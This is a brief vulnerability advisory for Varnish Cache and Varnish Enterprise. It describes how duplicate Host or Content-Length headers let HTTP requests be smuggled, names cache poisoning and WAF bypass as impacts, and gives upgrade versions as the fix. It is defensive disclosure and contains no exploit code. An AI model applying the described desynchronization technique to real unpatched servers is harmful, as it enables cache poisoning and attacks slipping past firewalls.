Varnish Cache and Varnish Enterprise Client-Side Desynchronization Vulnerability Allowing HTTP Request Smuggling

A client-side desynchronization vulnerability has been identified in Varnish Cache versions prior to 7.6.2 and Varnish Enterprise versions prior to 6.0.13r10. This vulnerability allows HTTP request smuggling by exploiting how certain malformed HTTP/1 requests are handled. When a request contains multiple 'Host' or 'Content-Length' headers, Varnish may respond with a '400 Bad Request' but then continue processing the connection with subsequent requests. This can lead to the misrouting of responses, as the server may incorrectly associate them with the wrong request.

Impact

Exploitation of this vulnerability could enable HTTP request smuggling attacks, with potential consequences for downstream systems. It could lead to cache poisoning, where a cache in front of Varnish stores incorrect or malicious content, serving it to users and possibly exposing sensitive information. Additionally, it could bypass Web Application Firewalls (WAFs) that do not inspect request bodies, allowing malicious requests to pass through unchallenged.

Remediation

Users are advised to upgrade to Varnish Cache 7.6.2 or 7.7.0, or Varnish Enterprise 6.0.13r10. After upgrading, Varnish should be restarted.